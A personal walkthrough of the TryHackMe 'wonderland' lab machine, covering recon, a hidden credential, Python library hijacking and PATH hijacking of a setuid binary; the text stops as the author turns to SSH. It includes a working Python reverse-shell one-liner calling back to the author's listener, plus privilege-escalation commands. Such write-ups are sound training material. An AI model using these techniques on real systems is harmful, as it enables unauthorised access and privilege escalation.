This is my writeup for the wonderland room/machine of TryHackMe.com platform. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…
Machine
Fall down the rabbit hole and enter wonderland.
The machine is called wonderland, room wonderland, the link is https://tryhackme.com/room/wonderland. This is a medium machine, I spent more time than I tought but…it’s a really good exercise completing it!
With this machine you can refresh a lot of good think with privilege escalation and how to read an elf file. Remember the IP is changing every time…
Recon
First of all I run a classic nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sC -sV -p- 10.10.40.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 04:44 EST
Nmap scan report for 10.10.40.248
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)|256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I’m looking at a Linux machine with the two classic ports open: 22 and 80.
The website is just a single page:
The Home Page
I run a cURL just in case I’m missing something
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
curl -L -i http://10.10.40.248
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/html;charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:45:08 GMT
Date: Tue, 18 Jan 2022 09:48:39 GMT
<!DOCTYPE html>
<head>
<title>Follow the white rabbit.</title>
<link rel="stylesheet"type="text/css"href="/main.css">
</head>
<body>
<h1>Follow the White Rabbit.</h1>
<p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
<img src="/img/white_rabbit_1.jpg"style="height: 50rem;">
</body>
The only new folder is the /img one and I’ll take a look in a bit.
I run a gobuster in order to check if there are some other pages hidden/not linked (for pages and directories)
gobuster dir -u http://10.10.40.248 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial)& Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0
[+] Expanded: true[+] Timeout: 10s===============================================================
2022/01/18 04:50:26 Starting gobuster in directory enumeration mode===============================================================
http://10.10.40.248/img (Status: 301)[Size: 0][--> img/]
http://10.10.40.248/index.html (Status: 301)[Size: 0][--> ./]
http://10.10.40.248/r (Status: 301)[Size: 0][--> r/]
gobuster dir -u http://10.10.40.248 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial)& Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s===============================================================
2022/01/18 04:51:51 Starting gobuster in directory enumeration mode===============================================================
/img (Status: 301)[Size: 0][--> img/]
/r (Status: 301)[Size: 0][--> r/]
/poem (Status: 301)[Size: 0][--> poem/]
and I notice there is a /r page, I browse to it
Nice…but still nothing, just an html page without any other clue. The /poem page is the same, just a “non-sense” poem :)
I run another gobuster for the directories, this time I use the http://10.10.40.248/r as starting point…and voila! It appears there is a /a following the /r page
Wait wait…what is following Alice? The white rabbit.
I’ve a clue: /r/a/, 99% sure the following pages will be /r/a/b/b/i/t
and there it is! Still an normal page without any link, I run a cURL and
curl -L -i http://10.10.40.248/r/a/b/b/i/t
HTTP/1.1 301 Moved Permanently
Location: t/
Date: Tue, 18 Jan 2022 10:07:42 GMT
Content-Length: 0
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 782
Content-Type: text/html;charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:41:05 GMT
Date: Tue, 18 Jan 2022 10:07:42 GMT
<!DOCTYPE html>
<head>
<title>Enter wonderland</title>
<link rel="stylesheet"type="text/css"href="/main.css">
</head>
<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:####THEPASSISHERE###</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>
…finally I’ve the user and pass to access as alice!
Another clue - found it later - was present on the image white_rabbit_1.jpg
If I download the image present on the home page and I analyze it with steghide I found a clue:
1
2
3
4
5
6
steghide extract -sf Downloads/white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
yes…I’ll follow the /r/a/b/b/i/t :)
Initial foothold (as alice)
I connect to the machine via SSH using alice and the password found:
1
2
3
4
ssh alice@10.10.40.248
...
alice@wonderland:~$
First of all I check what is present on my home directory
1
2
3
4
5
6
7
8
9
10
11
12
13
14
alice@wonderland:~$ ls -ltra
total 44
-rw-r--r-- 1 alice alice 807 May 252020 .profile
-rw-r--r-- 1 alice alice 220 May 252020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 252020 .bashrc
-rw-r--r-- 1 root root 3577 May 252020 walrus_and_the_carpenter.py
drwxrwxr-x 3 alice alice 4096 May 252020 .local
drwx------ 3 alice alice 4096 May 252020 .gnupg
drwx------ 2 alice alice 4096 May 252020 .cache
-rw------- 1 root root 66 May 252020 root.txt
lrwxrwxrwx 1 root root 9 May 252020 .bash_history -> /dev/null
drwxr-xr-x 6 root root 4096 May 252020 ..
-rw------- 1 alice alice 7 Jan 18 10:14 .python_history
drwxr-xr-x 5 alice alice 4096 Jan 18 10:14 .
The file root.txt will contains the root flag…for sure (and I can’t read it now) and the python script seems really interesting.
Now the tricky part: the hint on the room is Everything is upside down here.…well…if the root.txt is into alice’s homedir it means the user.txt is into the root’s homedir
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ cat /etc/sudoers.d/alice
alice ALL=(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su
alice@wonderland:~$ find / -type f -perm -04000 -ls 2>/dev/null
39428244 -rwsr-xr-- 1 root messagebus 42992 Jun 102019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
39447516 -rwsr-xr-x 1 root root 14328 Mar 272019 /usr/lib/policykit-1/polkit-agent-helper-1
394471428 -rwsr-xr-x 1 root root 436552 Mar 42019 /usr/lib/openssh/ssh-keysign
524949100 -rwsr-xr-x 1 root root 100760 Nov 232018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
39428912 -rwsr-xr-x 1 root root 10232 Mar 282017 /usr/lib/eject/dmcrypt-get-device
39371644 -rwsr-xr-x 1 root root 44528 Mar 222019 /usr/bin/chsh
39392040 -rwsr-xr-x 1 root root 37136 Mar 222019 /usr/bin/newuidmap
39409720 -rwsr-xr-x 1 root root 18448 Jun 282019 /usr/bin/traceroute6.iputils
39371476 -rwsr-xr-x 1 root root 76496 Mar 222019 /usr/bin/chfn
39393660 -rwsr-xr-x 1 root root 59640 Mar 222019 /usr/bin/passwd
39380976 -rwsr-xr-x 1 root root 75824 Mar 222019 /usr/bin/gpasswd
39391940 -rwsr-xr-x 1 root root 40344 Mar 222019 /usr/bin/newgrp
39366352 -rwsr-sr-x 1 daemon daemon 51464 Feb 202018 /usr/bin/at
39391840 -rwsr-xr-x 1 root root 37136 Mar 222019 /usr/bin/newgidmap
39395624 -rwsr-xr-x 1 root root 22520 Mar 272019 /usr/bin/pkexec
394061148 -rwsr-xr-x 1 root root 149080 Jan 312020 /usr/bin/sudo
65542732 -rwsr-xr-x 1 root root 30800 Aug 112016 /bin/fusermount
65597128 -rwsr-xr-x 1 root root 26696 Mar 52020 /bin/umount
65547864 -rwsr-xr-x 1 root root 64424 Jun 282019 /bin/ping
65597044 -rwsr-xr-x 1 root root 43088 Mar 52020 /bin/mount
65549444 -rwsr-xr-x 1 root root 44664 Mar 222019 /bin/su
alice@wonderland:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
Ok, it seems I can run the python script as the user rabbit (and gain access as rabbit), let’s read it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
alice@wonderland:~$catwalrus_and_the_carpenter.pyimportrandompoem="""The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
...cut...
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
The script is just importing a library (random) and is calling a method of this library (choice)…and printing some random string included on the script.
After a small research I found a good website with a well explanation of Python Library Hijacking:
This vulnerability is based on the priority order of the Python Library path that is applied to the Module file that our script is importing. When a module is imported in a script, the Python will look for the particular module file inside the default directories in particular priority order. In the python script that we created; we have the webbrowser.py module file that is called. The module that is being searched will be located in one of the default paths. Although if there exists a python module file in the same directory as the original script, it will get priority over the default paths.
What I have to do is creating a python file (or just copy the real random library) into the alice’s home dir, modify it with a reverse shell for example and run the script with sudo as rabbit.
Some other player just created a new script with a reverse shell or executed just a bash…my method is a little bit different and the same of the example present on the website: copy the random.py library, modify the choice method, open a new netcat listener on port 4444 and run the script (yes..more “difficult”)
alice@wonderland:~$ cp /usr/lib/python3.6/random.py .
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ vi random.py
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
try:
#### the new line is this one:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);####i= self._randbelow(len(seq))
except ValueError:
raise IndexError('Cannot choose from an empty sequence') from None
return seq[i]
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
and in the new listener the shell appears
1
2
3
4
5
6
nc -nvlp 4444
listening on [any]4444 ...
connect to [10.11.55.171] from (UNKNOWN)[10.10.188.29]47908
$ id
uid=1002(rabbit)gid=1002(rabbit)groups=1002(rabbit)
$
Good! I’m rabbit now…next step is moving into root! Ops, no! there is the hatter user before root.
PrivEsc 2 (hatter)
As usual, I run some classic commands in order to understand what I can and I can’t do
rabbit@wonderland:/home/rabbit$ ls -ltra
ls -ltra
total 40
-rw-r--r-- 1 rabbit rabbit 807 May 252020 .profile
-rw-r--r-- 1 rabbit rabbit 3771 May 252020 .bashrc
-rw-r--r-- 1 rabbit rabbit 220 May 252020 .bash_logout
drwxr-xr-x 6 root root 4096 May 252020 ..
lrwxrwxrwx 1 root root 9 May 252020 .bash_history -> /dev/null
-rwsr-sr-x 1 root root 16816 May 252020 teaParty
drwxr-x--- 2 rabbit rabbit 4096 May 252020 .
rabbit@wonderland:/home/rabbit$ file teaParty
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1(SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
104905220 -rwsr-sr-x 1 root root 16816 May 252020 /home/rabbit/teaParty
39428244 -rwsr-xr-- 1 root messagebus 42992 Jun 102019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
39447516 -rwsr-xr-x 1 root root 14328 Mar 272019 /usr/lib/policykit-1/polkit-agent-helper-1
394471428 -rwsr-xr-x 1 root root 436552 Mar 42019 /usr/lib/openssh/ssh-keysign
524949100 -rwsr-xr-x 1 root root 100760 Nov 232018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
39428912 -rwsr-xr-x 1 root root 10232 Mar 282017 /usr/lib/eject/dmcrypt-get-device
39371644 -rwsr-xr-x 1 root root 44528 Mar 222019 /usr/bin/chsh
39392040 -rwsr-xr-x 1 root root 37136 Mar 222019 /usr/bin/newuidmap
39409720 -rwsr-xr-x 1 root root 18448 Jun 282019 /usr/bin/traceroute6.iputils
39371476 -rwsr-xr-x 1 root root 76496 Mar 222019 /usr/bin/chfn
39393660 -rwsr-xr-x 1 root root 59640 Mar 222019 /usr/bin/passwd
39380976 -rwsr-xr-x 1 root root 75824 Mar 222019 /usr/bin/gpasswd
39391940 -rwsr-xr-x 1 root root 40344 Mar 222019 /usr/bin/newgrp
39366352 -rwsr-sr-x 1 daemon daemon 51464 Feb 202018 /usr/bin/at
39391840 -rwsr-xr-x 1 root root 37136 Mar 222019 /usr/bin/newgidmap
39395624 -rwsr-xr-x 1 root root 22520 Mar 272019 /usr/bin/pkexec
394061148 -rwsr-xr-x 1 root root 149080 Jan 312020 /usr/bin/sudo
65542732 -rwsr-xr-x 1 root root 30800 Aug 112016 /bin/fusermount
65597128 -rwsr-xr-x 1 root root 26696 Mar 52020 /bin/umount
65547864 -rwsr-xr-x 1 root root 64424 Jun 282019 /bin/ping
65597044 -rwsr-xr-x 1 root root 43088 Mar 52020 /bin/mount
65549444 -rwsr-xr-x 1 root root 44664 Mar 222019 /bin/su
the most interesting file is the teaParty executable, nothing else is present and I focus on it.
The teaParty elf is nothing really important, if I run it I have just a seg fault
1
2
3
4
5
6
7
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 18 Jan 2022 16:28:43 -0500
Ask very nicely, and I will give you some tea while you waitfor him
Segmentation fault (core dumped)
I download the file into my kali box with netcat and I check it:
objdump -s -j .rodata teaParty
teaParty: file format elf64-x86-64
Contents of section .rodata:
20000100020000000000 57656c63 6f6d6520 ........Welcome
2010 746f2074 686520746561207061727479 to the tea party
2020 210a5468 65204d61 6420486174746572 !.The Mad Hatter
2030 2077696c 6c206265 20686572 6520736f will be here so
2040 6f6e2e00 00000000 2f62696e 2f656368 on....../bin/ech
2050 6f202d6e 20275072 6f626162 6c792062 o -n 'Probably b
2060 79202720 26262064 61746520 2d2d6461 y '&& date --da
2070 74653d27 6e657874 20686f75 7227202d te='next hour' -
20805200000000000000 41736b20 76657279 R.......Ask very
2090 206e6963 656c792c 20616e64 20492077 nicely, and I w
20a0 696c6c20 67697665 20796f75 20736f6d ill give you som
20b0 6520746561207768 696c6520 796f7520 e tea while you
20c0 77616974 20666f72 2068696d 00000000waitfor him....
20d0 5365676d 656e7461 74696f6e 20666175 Segmentation fau
20e0 6c742028 636f7265 2064756d 70656429 lt (core dumped)
20f0 00
strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by '&& date --date='next hour' -R
Ask very nicely, and I will give you some tea while you waitfor him
Segmentation fault (core dumped);*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
The only interesting part is /bin/echo -n ‘Probably by ' && date –date=‘next hour’ -R and - checking it better - the date command is without the full/absolute path.
It means I can change the $PATH variable, add eg. the /tmp at the beginning of it and I can create a fake date command into /tmp who can spawn a shell. And - hopefully - being the hatter user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
rabbit@wonderland:/$ exportPATH=/tmp:$PATHexportPATH=/tmp:$PATH
rabbit@wonderland:/tmp$ echo'#!/bin/bash' > /tmp/date
rabbit@wonderland:/tmp$ echo'/bin/bash' >> /tmp/date
rabbit@wonderland:/tmp$ cat /tmp/date
#!/bin/bash
/bin/bash
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
id
uid=1003(hatter)gid=1002(rabbit)groups=1002(rabbit)
hatter@wonderland:/home/rabbit$
And boom! I’m the user hatter, let’s check the home dir
1
2
3
4
5
hatter@wonderland:/home/rabbit$ cd ../hatter
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
THISISTHEHATTERPASS
The password of the user hatter is present into the file! Good, let’s check via SSH
